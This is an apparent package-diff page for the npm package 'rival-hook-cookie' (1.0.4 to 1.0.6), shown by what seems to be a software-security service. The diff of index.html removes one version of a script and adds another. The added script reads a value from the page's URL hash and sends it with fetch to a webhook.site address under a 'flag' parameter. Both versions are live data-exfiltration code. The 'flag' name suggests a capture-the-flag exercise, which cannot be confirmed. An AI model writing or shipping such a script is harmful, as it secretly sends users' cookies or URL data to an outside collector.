rival-hook-cookie 1.0.4 → 1.0.6
Sign up to get free protection for your applications and to get access to all the features.
- package/index.html +2 -4
- package/package.json +1 -1
package/index.html
CHANGED
@@ -1,6 +1,4 @@
|
|
1
1
|
<script>
|
2
|
-
const
|
3
|
-
|
4
|
-
|
5
|
-
fetch("https://webhook.site/993897bc-3909-454f-a480-6c71fb276daf/?flag=" + cookie);
|
2
|
+
const cookie = window.location.hash.substring(1);
|
3
|
+
fetch("https://webhook.site/993897bc-3909-454f-a480-6c71fb276daf/?flag=" + cookie)
|
6
4
|
</script>
|